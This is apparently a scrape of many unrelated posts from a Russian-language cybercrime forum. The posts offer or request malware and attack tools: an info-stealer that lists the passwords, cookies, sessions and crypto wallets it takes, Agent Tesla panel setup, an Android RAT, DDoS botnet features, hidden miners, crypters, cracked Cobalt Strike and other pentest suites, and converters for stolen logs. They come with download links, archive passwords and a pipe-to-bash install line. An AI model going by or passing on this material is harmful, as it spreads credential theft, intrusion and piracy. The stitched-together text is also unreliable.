Install all that is necessary for your server, I took out an agro-industrial complex, demonstrating its function.
Training is carried out (initial, choice of 5-7 teams + admin panel installation + rebuild apk)
Everything installed is dumped into you in a password protected archive
Link Download:
](https://anonfiles.com/RaVcf3Obx2/Anubis-7.0-Full-Original_rar)
anonfiles.com
Password Rar:
##Anubis##
del
В целом понятно что это софт по рассылке в Whatsapp и Telegram. Полное описание которого можно найти на официальных сайтах. Обращу ваше внимание: Софт не я крякал и он не мой****а барыгам крякнули а они повесили протектор и давай продавать в сети._Я же в свою очередь написал только генератор ключе й _, что бы каждый смог себе активировать желаемый софт. Вирусототал стразу говорюгрязный потому как накрыты программы паблик протектором, у кого сомнения то запускайте на виртуалке.
Обратите внимание, перед тем как сгенерировать ключ, отметьте именно программу под которую будете делать ключ.
В архиве с программами есть инструкция по активации в виде Gif анимации , если кто не разберётся. Надеюсь софт будет полезен и мои труды не зря .
You must have at least 30 reaction(s) to view the content.
Валяется в паблике, относительно свежий.
Написан на шарпах, русским кодером ( все комменты на русском )
Из возможностей :
— поддержка Chromium, Geko и Edge
— кража паролей, cookie файлов и закладок
— кража сессий Discord (браузеры, клиент)
— кража сессий Steam (список аккаунтов)
— граббер всех активных процессов
— граббер одиннадцати криптокошельков
— скриншот основного экрана жертвы
— граббер файлов с рабочего стола
— граббер информации о системе
— после выполнения функции заметает все следы
— отправка логов в среднем за 3-6 секунд
— поддержка Windows 8, 8.1, 10, 11
Скачать (AnonFiles) :
ТЫК
Pass :
Code:Copy to clipboard
U2FsdGVkX1/eF+YFQz8N5KYE74/nFSSVa3psN1egFmVeII9tjx8C2i8bY+QSaRRb
beAI+OIAzGV44lFn4SniqA==
пароль к архиву < base64 < ASCII < AES-128 (key : skriptkiddy )
You must have at least 20 message(s) to view the content.
Топовый Майнер SilentXMRMiner v0.9 скачать официальный сайт ( СКАЧАТЬ )
Настройки берём с сайта ( САЙТ )
Майнер работает только на монету монеро XMR !!! ( можно использовать другие
пулы рекомендуется сайт выше так как он майнит сразу в рубли )
Была такая проблема, что много файлов нужно было склеить в один? Эта программа поможет вам!
Простой в использовании.
Hidden content for authorized users.
https://www.sendspace.com/file/8725u0
Hidden content for authorized users.
https://anonfiles.com/t333r0c0p8/_exe
(c)Guron
Hidden content for authorized users.
Updates
Updated Python binaries to v3.8.10
Updated WordPress plugin and WordPress core vulnerability checks
.SH - <https://mega.nz/file/CrQjXSwJ#40s_-
dB4awKN5XWuPnBRE8Qv49CA8B46wxJnvhfM7Cg>
.EXE -
https://mega.nz/file/qmIFTQSS#9uzNrT3imAKn_drTakYim9if6-wfEDC5b4xmqGOqR4k
Кряк с инструкцией - <https://mega.nz/folder/ESpHFaaQ#P9_TzzmBPgd-
bYowdNjo3g/folder/ALxVjIyR>
VT .EXE -
https://www.virustotal.com/gui/file...9210bfe24e43f0d3c0af17ceb8885a9df5a?nocache=1
VT .SH -
https://www.virustotal.com/gui/file...245ea7aaa6836260a84e73af01ae1668ca5?nocache=1
VT Кряк -
https://www.virustotal.com/gui/file...1a2cf2f16a71dbde72d5d4b009cf211ac83?nocache=1
P.S. Если линки сдохнут, пишите, обновлю.
Функционал:
Spoiler
Скачать:
You must have at least 10 message(s) to view the content.
Пароль:
You must have at least 10 message(s) to view the content.
ВНИМАНИЕ: СОФТ НА СКЛЕЙКУ НЕ ПРОВЕРЯЛСЯ!
Today I present to you the ultimate hacking machine ever. A project called
H3xShare. Soon will be released for a fair price. Checkout the feature and
wait for my updates.
[LIKES = 20]
[/
LIKES]
_Писали под заказ, решил поделиться с пользователями XSS.
_
Вытаскивает из Passwords;PasswordsList логин и пароль!
- Три режима поиска в зависимости от конфига стиллера
- Работает только с папками, архивы не читает
- В минуту где-то обрабатывает порядка 400 ботов (проверял на своей машине,
возможно у Вас будет больше показатель)
You must spend at least 31 day(s) on the forum to view the content.
Добрый вечер. Вообщем, есть ли софт в который можно будет загрузить большое количество баз данных (log:pass или что-то подобное), синхронизировать их между собой и искать конкретную строчку сразу по всем базам ? Заранее спасибо
You must have at least 30 reaction(s) to view the content.
Описание:
Данный фреймворк содержит в себе все инструменты используемые в небезызвестном сериале Mr. Robot. Структура фреймворка состоит из огромного набора инструментов для проведения тестирования на проникновение, отсортированных по категориям, от сбора информации до пост-эксплуатации. Плюсом Fsociety является то, что его можно запустить на Windows, Linux и Android. Для работы фреймворка необходимо иметь Python 2.7
Spoiler: Список инструментов
Information Gathering – Сбор информации
Password Attacks – Парольные атаки
Wireless Testing – Беспроводное тестирование
Exploitation Tools – Инструменты для эксплойта
Sniffing & Spoofing – Сниффинг и спуфинг
Web Hacking – Веб-взлом
Private Web Hacking –Частный взлом вэб
Post Exploitation эксплойты почты
INSTALL & UPDATE – установка и обновление
Spoiler: Установка
Установка на Linux
Скачиваем Fsociety c GitHub:
Code:Copy to clipboard
git clone https://github.com/Manisso/fsociety
cd fsociety
chmod +x install.sh
Или
Code:Copy to clipboard
bash <(wget -qO- https://git.io/vAtmB)
Запускаем фреймворк командой:
Code:Copy to clipboard
fsociety
Установка на Windows
Загрузим и установим Cygwin
Также необходимо скачать Python
2.7
И репозиторий с GitHub
Разархивируем и запускаем из командной строки
Code:Copy to clipboard
python fsociety.py
Или вы можете воспользоватся Google Cloud Shell
Установка на Android
Установим из Google Play приложение
Termux
Для установки фреймворка в приложении Termux необходимо выполнить следующую
команду:
Code:Copy to clipboard
bash <(curl -s https://raw.githubusercontent.com/Manisso/fsociety/master/install.sh)
[Более подробное руководство по использованию программы](https://tgraph.io/Obzor-frejmvorka-Fsociety-Sbor-informacii- CHast-1-05-20)
Страница проекта на GitHub
VT -Ложные срабатывание из-за обфускации
2021
Spoiler: Что нового:
Скачать:
Hidden content for authorized users.
Hidden content for authorized users.
Инструмент для работы с логами Echelon
Запуск:
Code:Copy to clipboard
Required option 'p, path' is missing.
-p, --path Required. Path to folder with logs
-v, --verbose Passwords view verbose mode
-e, --everything Use Everything service
--help Display this help screen.
--version Display version information.
это чрезвычайно универсальный инструмент сетевого мониторинга для Windows
X-NetStat - это универсальный инструмент сетевого мониторинга для Windows.
Он развивается с 1998 года.
Подробная информация о соединениях TCP / IP
Нижняя панель обеспечивает доступ к соединению, процессу, порту, WHOIS и
системной информации.
На вкладке «Информация о соединении» представлена доступная информация о TCP- соединении.
Подробная информация о процессе
X-NetStat показывает приложения, которые обрабатывают трафик TCP и UDP. На
вкладке «Информация о процессе» отображаются основные сведения о процессе,
включая информацию о встроенной версии, хэш-информацию MD5 и наличие у файла
цифровой подписи.
Вы также можете запустить Process Explorer с помощью SysInternals из X-NetStat, чтобы отобразить чрезвычайно подробную информацию.
Осведомленность о местонахождении
Новое в X-NetStat 6 - это географическая осведомленность и панель
«Местоположение». Он может показать вам приблизительное местоположение
удаленного хоста, включая количество переходов и скорость линии.
Вы также можете использовать местоположение страны в качестве условия в правиле, а также классифицировать страны как «безопасные», «нейтральные» или «опасные», чтобы раскрасить их в таблице подключений.
Осведомленность об адресах
X-NetStat 6 теперь имеет лучшую интеграцию с реестрами IP-адресов, такими как
ARIN и RIPE. Вы можете получить эту информацию в реальном времени с помощью
агента или найти ее вручную.
Вкладка Netblock показывает владельца выбранного IP-адреса и любую информацию о нем, которую можно найти в Википедии.
Браузер WHOIS
Встроенный браузер WHOIS можно использовать для ручного поиска записей IP-
адресов и доменных имен. Запросы автоматически направляются на соответствующий
сервер WHOIS.
Системная информация
На панели «Информация о системе» отображается информация о вашем компьютере,
вашей локальной сети, вашем интернет-провайдере и информация о сеансе
X-NetStat.
Установите правила для запуска действий
XNS может реагировать на определенные условия подключения / сети с помощью
встроенной системы правил. Введите условия для запуска одного или нескольких
действий, например:
Всплывающее сообщение с предупреждением
Доступ к URL-адресу обратного вызова / веб-сервису
Запустить EXE-файл или скрипт
Автоматически убивать соединение
Отправить электронное письмо или текстовое сообщение
Оповещение, инициированное правилом
Пример оповещения о сообщении из сработавшего правила.
Все в контексте
Доступ к функциям и командам программы в контексте любого подключения. Просто
щелкните правой кнопкой мыши.
Погрузитесь в сетевую статистику
Поднимите жизненно важные показатели для ваших сетевых карт, включая
статистику для протоколов IP, ICMP, TCP / IP и UDP.
Лицензия на программное обеспечение: Technicians
Версия: 6.0.0.23
Цена: $ 49.95
Скидка: 100% OFF
Имя файла: X-NetStat Technicians v6.0.0.23 Full Activated -WwW.Dr-FarFar.CoM.zip
Размер: 80 МБ
[Virustotal](https://www.virustotal.com/gui/file- analysis/NTNkZmVkMjIyYTY0ZTQwNGM2ZTY3NzMzOWNkMjY5ODM6MTYyNTg2MzcxNQ==/detection)
Добрый день уважаемые форумчане.
Я решил слить приватный спамер по телеграмм чатам.
Данный скрипт я приобрел неделю назад , скрипт годный на рынке стоит от 2500р,
легкий функционал.
Если понравится то буду еще сливать софт и не только
Будут вопросы пишите разберемся )
Скачать - https://anonfiles.com/B6p1scQ4u6/SpamerTG_byNelu_rar
Пароль - Nelu
VT -
a57df97e40eb2a2afe20fedd899ab4b626a6721427af7bfef9067e07cdf9aedf
download
https://cdn.discordapp.com/attachments/879199778477604884/884790384524402728/sysbig.tar.gz
https://cdn.discordapp.com/attachments/883439588872450139/884192136285810768/all.tar.gz
leaked intrusive
lucifer botnet soon
burpsuite_pro_v2021.5.jar checksums
SHA256:1bba322246e7e92caa8c383d19fce97163e5492f20690b3b16d49a2efb28618a
MD5:cd0f61ba667cb7339307ad93dc9aa1f0
download link:
![gofile.io](/proxy.php?image=https%3A%2F%2Fgofile.io%2Fdist%2Fimg%2Flogo- small-og.png&hash=32429581fada6ae1887e27dfa99f76aa&return_error=1)
](https://gofile.io/d/TN51GP)
Gofile is a free, secure file sharing and storage platform. With unlimited bandwidth and storage, you can easily store and share files of any type without any limits. Our advanced features, such as CDN support and password protection, make Gofile the ideal choice for individuals and businesses...
gofile.io
pass: www.ddosi.com
update log:
This release includes several improvements to Intruder, one of which allows you to save Intruder attacks to project files. The release also includes other minor Burp Suite improvements.
You can now save Intruder attacks to project files, so you can close Burp Suite and come back later to continue your attacks, or view the results of completed attacks. This is done on an opt-in basis: attacks are not saved by default, to avoid bloating project files. An attack can be saved before, during, or after it has been performed. The title bar of an attack window shows whether it has been saved or not.
We have made several other improvements to Intruder. These include:
We have updated Burp Suite's embedded browser to Chromium version 90.0.4430.93, which fixes several security issues that Google has [classified as high](https://chromereleases.googleblog.com/2021/04/stable-channel-update- for-desktop_20.html).
You can now optionally supply a specific TTL value when configuring custom DNS records in Burp Collaborator.
Correct way to open:
![](/proxy.php?image=https%3A%2F%2Fwww.ddosi.com%2Fwp- content%2Fuploads%2F2021%2F04%2Fburpsuite_pro_v2021.5.gif&hash=6496a77bfa9305dbefa70c9cfc872036)
Добрый вечер.
На данный момент очень сильно нуждаюсь в зрителях YouTube ( Прямой эфир )
Что мне нужно?
Человек, который может осуществлять накрутку для прямых трансляций YouTube или
же программист, который способен написать софт накрутки зрителей для прямых
трансляций YouTube
Готов работать через любого проверенного гаранта
-------------------------------------------------------------
За всеми подробностями в PM или же в Telegram - @gorengok
Юзал поиск на 3 форумах, накупил кучу разного чудо-софта, но итог не очень: в
большинстве случаев в валид попадают либо забаненные аккаунты, либо они
становятся забаненными как раз из-за такого чека.
Может кто-то посоветовать адекватный рабочий чеккер Facebook, который не
убивает аккаунты? Само-собой, цена софта не проблема.
ПрограммаPassport RF это софт для создание сканов паспортов. Для тех кто занимается подобным делом то программа будет отличным помощником.
You must have at least 50 message(s) to view the content.
Hidden content for authorized users.
Универсальный брутфорс:
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F258225166%2Ff8d8eb00-4e39-11eb-8c61-94fec0c05080&hash=07926bdc5c813d31dab0235747b636d2&return_error=1)
](https://github.com/openbullet/OpenBullet2)
OpenBullet reinvented. Contribute to openbullet/OpenBullet2 development by creating an account on GitHub.
github.com
](https://github.com/openbullet/openbullet)
The OpenBullet web testing application. Contribute to openbullet/openbullet development by creating an account on GitHub.
github.com
](https://github.com/mohamm4dx/SilverBullet)
Silver Bullet. Contribute to mohamm4dx/SilverBullet development by creating an account on GitHub.
github.com
Инфа про сильвер: https://xss.is/threads/52060
WordPress Bruteforce
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F311336022%2F2d1e6b00-8996-11eb-9fe5-5e4d23314d40&hash=460c52314325105bd9295d53899cb494&return_error=1)
force tool used to remotely test WordPress blogging software ](https://github.com/22XploiterCrew-Team/WordPress-Brute-Force)
WpCrack is an audit and brute force tool used to remotely test WordPress blogging software - GitHub - 22XploiterCrew-Team/WpCrack: WpCrack is an audit and brute force tool used to remotely test Wor...
github.com
Hydra Brute/Checker - click to download
Spoiler: any + vt, Hydra B&C
012fc49e9b28235a17e6eef64b758ca1f6ec0764a467297c84d2f35bfdbe2fd6
На счет склеек не в курсе, проверки ниже
detected - Interactive analysis ANY.RUN ](https://app.any.run/tasks/233e1932-0733-41e1-9184-d8d5b7f487c2)
Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.
app.any.run
](https://www.virustotal.com/gui/file/5d9c2b1822bcaa71ddeaa5426d4312d8e174766ae8864c7add29d7f44cea87f2/detection)
VirusTotal
www.virustotal.com
](https://www.virustotal.com/gui/file/012fc49e9b28235a17e6eef64b758ca1f6ec0764a467297c84d2f35bfdbe2fd6/detection)
VirusTotal
www.virustotal.com
Простой лодырь замаскирован под курс крипты.
You must have at least 10 reaction(s) to view the content.
Привет не большая роздача для самых зеленых
линк https://dropmefiles.com/t9W2m
Как загрузить в визуал студию?
Файл>Открыть>Папку>папку с лоадером
пункт 2
заходим в папку с сорцами и перетягифаем файл Form1.cs в визуал студию
вот скрин самого софта
VMware Workstation Pro/Player 16.1.0 Build 117198959
Download Link -
[VMware Workstation Pro
16.1.0](https://download3.vmware.com/software/wkst/file/VMware-workstation-
full-16.1.0-17198959.exe)
[VMware Workstation Player
16.1.0](https://download3.vmware.com/software/player/file/VMware-
player-16.1.0-17198959.exe)
Spoiler: Key -
VMware Workstation Pro 16.1.0:
YA7RA-F6Y46-H889Z-LZMXZ-WF8UA
ZV7HR-4YX17-M80EP-JDMQG-PF0RF
GY3RH-42X10-M8E0Q-FXNZT-XARC2
VMware Workstation Player 16.1.0:
AY5X2-0NX1M-4845Q-KNPGG-PUKV0
YA1TU-8TEEK-M8DLY-X6XNG-XY09D
CY3JK-42GD2-M8D0P-FZNXZ-NAKV6
Methods:
1. ImgSearch all disc.
- USBSpread,
- Tor Communication,
- Multi-language,
- Attacks:
- SlowLoris,
- ARME,
- Hulk,
- RUDY,
- TCP and UDP,
- ICMP,
- HTTPBandWidth,
- TORLoris.
- Monero minning,
- Execute file
- Open website
- ScreenShots
- Get Computer All hardware and deatils
- Send Message
- Seed Torrent
- Support fallback panel
- SourceCode/Git grabber
- FireFox, Chrome, FileZilla account grabber
- CMD executter
- Host file editor
- Process show and kill
- Ads miner
- Show attack speed
Click to expand...
Install:
- Install Python and PostgreSQL
- Open DataBaseCreator and overwrite connect database in appsettings.json and copy to Panel.
- Import "Alduin/DataBaseCreator/DB/_CreateSchema.sql".
- Run "Alduin/DataBaseCreator/Alduin.DatabaseCreator.exe" and follow the instructions.
- Run "Alduin/Alduin.Web.exe" and Open "https://127.0.0.1:5001"
- Login and navigate to Tor settings edit torrc file and Restart Tor.
- Copy Onion Address and Open "Alduin/Bot/Config.Json" and pastle to "Address" and overwirte debug to "false".
Click to expand...
Download:
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Fdcc8c219d8877a73e7ced9165128f0bac07688445fbae0e33845101df871ea82%2Fmogyiii%2FAlduin- botnet%2Freleases%2Ftag%2F1.1&hash=f1396918d9968ad62e9235ad5c194747&return_error=1)
](https://github.com/mogyiii/Alduin-botnet/releases/tag/1.1)
Public Release.
github.com
](https://ufile.io/2s4lwsok)
Download coinbase check.zip for free from ufile.io instantly, no signup required and no popup ads
ufile.io
Web App scanner
WIN
[URL unfurl = "true"] https://www96.zippyshare.com/v/lcej88i5/file.html [/
URL]
LINUX
[URL unfurl = "true"] https://www13.zippyshare.com/v/Q2UZ4FJ4/file.html [/
URL]
url to crack https://github.com/1amfine2333/xray-crack
https://lgf.im/posts/security/reverse/xray-cracker/
**CH Miner - Скрытая система майнинга и контроля для любых консольных
майнеров.
Функционал:
Доп. Функции:
Защита:
**
**Скачать последнюю версию можете тут:https://ispcloud.online/chminer/
Оф. канал разработчика: https://t.me/chminer Присоединяйся и будь в курсе всей информации по CH Miner!
Контакты автора: https://t.me/chminer_coder
**
Удачного майнинга и огромных хешрейтов!!!
**Fud Лоадера на c#
**
You must have at least 20 reaction(s) to view the content.
Ищу банковский троян под Windows. За пабликом в ЛС не писать, нужен качественный и проверенный продукт.
Делюсь тем, что нашел. Я еще не проверял это, но скоро проверю:
MEGA Tor:
http://crqkllx7afomrokwx6f2sjcnl2do2i3i77hjjb4eqetlgq3cths3o6ad.onion/t4T73210/
MEGA Clear:
https://mega.nz/file/pK5m0CwQ#fhHCjqilAwuh7fu-9yaKuUccRxypkQJIqf8iVZAauwI
Сборка за ноябрь 15 2020г - virtual machine
Hidden content for authorized users.
You must have at least 2 message(s) to view the content.
Positive Technologies Application Inspector Enterprise VIP
Acunetix Preium
Rapid7 AppSpider Premium
Core Impact
Tenable Nessus Professional
HCL AppScan standart
Maltego XL
NetSparker professional edition
Brute Shark
Goby Attack Surface Mapping
FileSeek Por Enterprise
Подскажите какой хороший ботнет можно взять в аренду
You must have at least 5 message(s) to view the content.
AnonFox
Или же бесплатная сборка Firefox нацеленая на конфендициальность в мировой и
тёмной паутине.
Spoiler: О сборке и её характер
Предустановленные расширения:
- Clear Cache
- ClearURLs
- Dark Reader (Контрасность +10)
- Decentraleyes
- DuckDuckGo Privacy Essentials
- FoxyProxy Standard (Предустановлен рабочий прокси!)
- HTTPS Everywhere (По умолчания включено шифрование для всех сайтов!)
- NoScript
- Privacy Badger
- Privacy Possum
- Spoof Timezone
- uBlock Origin
- User Agent Platform Spoofer
Время от времени буду обновлять её.
Обо всех недочётах сборки писать в этом посте или мне в Jabber: DuckyDust@0day.im !
Spoiler: Ссылка на скачивание тут
Mega: https://mega.nz/folder/nGgkxYqR#3XMgufrJcCp0H7X6fZc81Q
Господа, может кто-то сталкивался. Появилась необходимость поднятия своих IPv6
socks5 проксей на VPS
Перепробовал кучу вариантов на базе 3proxy и squid, но получалось сделать
только HTTP
Может кто-то поделиться актуальным мануалом?
Нашел такую штучку, не знаю может кому нибудь пригодится..
You must have at least 5 message(s) to view the content.
Софт для конверта логов. Конвертируется Passwords.txt в
URL|USERNAME|PASSWORD
.
Понимает такие форматы (для других пишите в личку)
Code:Copy to clipboard
URL: https://www.ggogle.com //Redline
Username: Ashot
Password: Oneshot
Application: Google_[Chrome]_Default
--------------------------------------
Url: https://www.google.com //Unknown
Login: Ashot
Password: Oneshot
Browser: Browser (user: Administrator)
--------------------------------------
SOFT: Microsoft Edge(Default) //Azor?
HOST: https://www.google.com
USER: Ashot
PASS: Oneshot
Как запускать:
./log2psv -d /share/Logs -o out.txt -m zip
Где -d
Каталог с логами. Может содержать как запакованые в zip, так и
распакованные.
-o
-- outfile. Сюда запишется результат обработки.
-m
-- mode. Для zip-архивов -m zip
и для распакованных -m txt
соответственно. Миксовать нельзя.
И в конце psql -c "COPY tbname FROM './out.txt' delimiter '|' csv;"
Сказать спасибо можно сюда 1AdAdQAXqndB1z2zsq28AhCQQSC9yEPDUZ
Хочу научиться хакать вай фай
За $
Бесплатный прокси чекер SOCKS 4/5 HTTP(-s)
_
Результат добавляет в отдельную папку.
Проверка HTTP(-s) и SOCKS 4/5 прокси._
Hidden content for authorized users.
https://www.sendspace.com/file/xxu604
(c)Автор не я, скачивал еще давно на соседнем борде, возможно кому пригодится.
Исходники - https://disk.yandex.ru/d/OndDLuptffdgng
Для просмотра куки файлов : Браузер -
https://www.mozilla.org/ru/firefox/new/
Плагин - https://addons.mozilla.org/ru/firefox/addon/cookie-quick-manager/
Сайт по накрутке - ( http://freelikes.online )
Пароль от Логов которые будут приходить ( 44 )
](https://anonfiles.com/bdQ7Ldtau3/cobaltstrike4.3_www.ddosi.com_rar)
anonfiles.com
pass: www.ddosi.com
Because the cracking process modified the program, so the software SHA256 and the official website is not the same.
SHA256
cobaltstrike.jar:
1f472f1ad1d5aea0cb51200f07f2fcdb24c8b0646ef1ebe2d72e3cf7b2c54662
cobaltstrike.exe:
b97db8ebc398ea68713488fe0c3574eeddfa009750e92244c4855dfb6fdec054
**
https://verify.cobaltstrike.com/
**
Dowland pass xxs.is
ФУНКЦИОНАЛ:
Spoiler
File manager
SMS Manager
Calls Manager
Contacts Manager
Location Manager
Account Manager
Camera Manager
Shell Terminal
Application
Microphone
Keylogger
Setting
Client
Chat
Fun
Скачать:
You must have at least 10 reaction(s) to view the content.
Functions:
Spoiler
+ Protection from programs for scanning the bot: Wireshark, HTTPAnalyzer,
ProcessHacker, MonitorTraffic and also continue this list.
+ HTTP Flood (Reset TCP Flags) - if you read the specification of the
protocol tcp, then to perform the load, you need to reset the connection
without waiting for a response from the server, this method is used for DDoS
attacks on sites.
+ HTTP Flood (ARMA Method) - synchronizes all active threads and connections
among themselves, waits until the request is sent and closes connections, i.e.
at the same time sends a bunch of requests on level with all bots ...
+ SYN Flood - works on two, the above-described mode and waits until the
server returns a response.
+ UDP Flood - sends huge, randomized packets
+ Additional Loader, if there is no build on the PC from the botnet, then
this "loader" will load the build (i.e., recover)
+ Main Loader - loads and starts the file.
+ In the panel, you can specify the time for the bots to be banned.
+ Uninstall build on bots in 1 click in the panel.
+ Running Proxy servers with different types of HTTP / S, Socks 4/5 with
login or password for authorization.
+ Functions for unloading any files from the victim with the PC, and sending
them to the panel.
+ Functions for working with memory, turning off DEP mode - for writing to
memory.
+ Bypass to bypass UAC'a, works on WinXP.
+ Exploit SMB (I can turn on)
Core Impact 19.1 с лицензией
Hidden content for authorized users.
](https://anonfiles.com/l8Sad2L2o1/CORE_IMPACT_19.1_with_license_rar)
anonfiles.com
Hidden content for authorized users.
You must have at least 100 message(s) to view the content.
Сабж, подскажите проверенный платный/бесплатный софт или сервис для чека пару млн строк урлов.
иногда использую акушу.установил кряк 17 декабря.думал ну проверим.проверял 2 мес.итог сайты которые 400% дырявые она не видит.профиля я настраиваю сам ибо мне кроме sql и бекапов от сканера ничего не нужно.итог 10 версия видит то что 17дек кряк нет.одно могу сказать что это не только сканер sql и тем людям кто юзает другие дыры она очень даже поможет.но опять есть одно но!все сканеры имеют свойство палиться,мелкие сайты от окуня просто падают.если вы юзаете такие инструменты скана советую просто редактировать профиля или свои запросы ставить в неовом профиле.это займет меньше времени+меньше нагрузит сайт.по мелким вопросам в настройке разных версий могу помочь без б.тока сильно не нагружайте меня с совсем глупыми вопросами.
Кто может отсканить диапазон IP по 443 и 80 портам?
Software name : Elcomsoft Wireless Security Auditor
Version : 7.12.538.44907.30.593
Last Update : 2021
OS : WinALL
Developer : Elcomsoft
Web-site : http://elcomsoft.com/
Edition : PRO Edition
Audit security of your wireless networks and recover WPA/WPA2 passwords with Elcomsoft Wireless Security Auditor. In addition to the CPU-only mode, the new wireless password recovery tool features a patented GPU acceleration technology to speed up password recovery. Elcomsoft Wireless Security Auditor targets the human factor with smart attacks, combining dictionary attacks with an advanced variation facility. The tool accepts standard tcpdump logs supported by any Wi-Fi sniffer.
Download :
https://anonym.to/?https://anonfiles.com/v7f1Q24bq8/Elcomsoft.Wireless.Security.Auditor.7.30.593_rar
Or
Spoiler: PicoFile
Elcomsoft.Wireless.Security.Auditor.7.30.593
имеется программное обеспечение от Elcomsoft.
если они понадобятся, я их поставлю.
Hidden content for authorized users.
Agent Tesla Stealer. Web panel files and builder.
You need to install ioncube loader in your server/dedik.
And copy your key in builder and go to api.php file find this string > $mykey
= "PASTE YOUR KEY HERE";
After that just go to mysite.com/setup.php and install your database
Download
Pass: xss.is
Приветствую, выкладываю сюда данного бота, выкачал его у одного мамонта так
как у него была не защищена директория, то есть целый zip архив, сам я им не
пользовался и не знаю как его устанавливать, файлик с db, я там не наблюдаю,
хз, но были какие то файлы с keepass, их так же не получилось дешифровать,
пароль хз какой на них стоит. в файлах все данные от панели чужого мамонта, то
есть видимо мамонт заполнял данные сначала на компе config.php и т.д а после
запаковал в архив и закинул к себе на хостинг, вроде бы все...
Смотрите пользуйтесь разбирайтесь, кому может и будет полезны файлы данного
бота!
You must have at least 20 reaction(s) to view the content.
Приветствую , может у кого завалялась программка для рассылки по доскам объявлений ( типо- хрумер, Smart Poster, BoardMaster, Pantera)
Буду благодарен , Всем привет.
Этот инструмент будет генерировать и проверять токены API TikTok, также известные как идентификаторы сеанса. Это полезно, если вы проверяете имена пользователей через TikTok API, и у вас закончились идентификаторы без ограничения скорости! Я советую использовать 30-100 потоков и обязательно включил бы Vpn, потому что ваш IP-адрес может быть очень быстро ограничен, будете осторожны!
You must have at least 3 reaction(s) to view the content.
Vt
- 1 жалуется (запускать на вирт)
Сборка всех самых дорогих инструментов из мира ИБ для пентеста в одном дистрибутиве Windows от известного крэкера Dr.FarFar. Сборка представлена в виде образа виртуальной машины, что как раз удобно. В сборке представлены последний Core Impact и Netsparker, Accunetix, а также другой софт, который продается просто за баснословные деньги. Удачного пентеста.
![](/proxy.php?image=https%3A%2F%2Fcybersec.org%2Fwp- content%2Fuploads%2F2021%2F02%2Fphoto_2021-02-12_01-57-36-815x570.jpg&hash=38a63717fc3f674337cd97541246e278)
You must have at least 1 reaction(s) to view the content.
Хочу запилить проект, стоит выбор между гитлабом, гитхабом и битбакетом.
Чем кто пользуется? Платно/бесплатно, удобства, бкзопасность?
Друзья, кто подскажет решение? Вручную из микс базы муторно вытаскивать ту же Юсу к примеру, может кто знает какая софтина поможет решить данную задачу.
Написал небольшой спамер на python, но так как я слабо умею программировать вышло немного криво.
Для удобства спамер был скомпилирован в двух версиях:
"Только .exe" может работать медленнее
Spoiler: Скрины
Не знаю ещё какие скрины нужны.
Spoiler: Инструкция
1. Запускаем программу.
2. Выставляем параметры.
3. Пока идет отсчет (последний параметр) переходим в нужную программу и
нажимаем на строку ввода.
4. После отсчета начинается спам.
Spoiler: Скачать
Spoiler: Полный
Spoiler: Только exe
Яндекс.Диск
[Гугл Диск](https://drive.google.com/file/d/1pQsOZioeYMEVPjNM-
nkS6fa7UGj3ivlS/view?usp=sharing)
Hidden content for authorized users.
Слышали про Kali Linux от мира Windows? Представляем обзор Ninjutsu OS – специализированную ОС на базе Windows 10 для тестирования безопасности.
![#](/proxy.php?image=https%3A%2F%2Ftomhunter.ru%2Fwp-
content%2Fuploads%2F2020%2F05%2Fnunjutsu-
os-1-1300x640.png&hash=da8ec224160cf0cba34743c26df37fd3)
[Ninjutsu-OS](https://ninjutsu-os.github.io/2020/04/18/What-Is-Ninjutsu-
OS/) — это специализированная ОС на базе Windows 10 (сборка 1909), которая
содержит более 800 инструментов для тестирования кибербезопасности. Эдакий
Kali Linux, только от мира Windows. Релиз совсем свежий, состоялся 18.04.2020.
Установка самой ОС ничем не отличается от стандартной установки Win 10, за тем
лишь исключением, что она ощутимо дольше.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fvt%2Fjv%2Fz5%2Fvtjvz5qup7ku8sgi6gv0cou_-
tk.jpeg&hash=4f2d5d1e1ae9fa5cffe1e4c8ca9774e0)
После запуска самой ОС потребуется еще около 10 минут, чтобы все доустановить
и настроить. После всех манипуляций нас встречает слегка перегруженный (на мой
взгляд) и весьма колоритный рабочий стол.
Всего в сборку вошло более 800 утилит. Некоторые из них автору пришлось
адаптировать, чтобы они начали запускаться под Windows.
В верхней части расположен отдельный бар, в котором собраны все утилиты по
категориям для быстроты доступа. Категорирование утилит выполнено с упором на
методологию OSCP с оглядкой на категорирование в Kali Linux:
— Mr.Robot tools kit — самые часто используемые утилиты и прочие допматериалы,
по мнению автора сборки. Личный топ, так сказать;
— Red Teaming — самые часто используемые утилиты для тестирования по
категориям. По сути, это все топ-утилиты со всех категорий ниже под одной
вкладкой;
— Information Gathering — сбор информации;
— Exploitation Tools — эксплуатация уязвимостей;
— Malware analysis — анализ вредоносного ПО;
— Mobile Security Tools — тестирование мобильных устройств;
— Network Attack — сетевые атаки;
— Password Attacks — взлом паролей;
— Proxy and Privacy Tools — проксирование и анонимайзеры;
— Reverse Engineering — реверс инжиниринг;
— Stress Testing — стресс тестирование (DDoS);
— Vulnerability Analysis — поиск уязвимостей;
— Web Application Attack — веб-пентест;
— Wireless Attacks — атаки на беспроводные сети (Wi-Fi и Bluetooth),
— Fuzzing and payloads — фаззинг и рабочие нагрузки;
— Remote Control Tools — удаленное управление;
— Utility Tools — прочие вспомогательные утилиты (Winrar, MySQL и др.);
Полный список доступных утилит можно посмотреть на сайте
проекта. ОС
отлично подойдет как для чистого пентеста, так и для людей, которые занимаются
реверс инжинирингом, OSINT или анализом вредоносного ПО. За несколько дней
работы на ОС я не поймал каких-либо критических багов или сбоев в работе ПО.
Тестировал на машинах с Hack the Box плюс подвернулся дополнительный проект по
OSINT.
Spoiler: file
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
www.mediafire.com
Spoiler: orig.
center/publications/ninjutsu-os.html)
В статье рассматриваем новый релиз – специализированную ОС на базе Windows 10, которая содержит более 800 инструментов для тестирования кибербезопасности
![tomhunter.ru](/proxy.php?image=https%3A%2F%2Ftomhunter.ru%2Fwp- content%2Fthemes%2FT.Hunter%2Ffavicon-16x16.png&hash=348b604d47a56a0aeeb47da4db15fd7d&return_error=1) tomhunter.ru
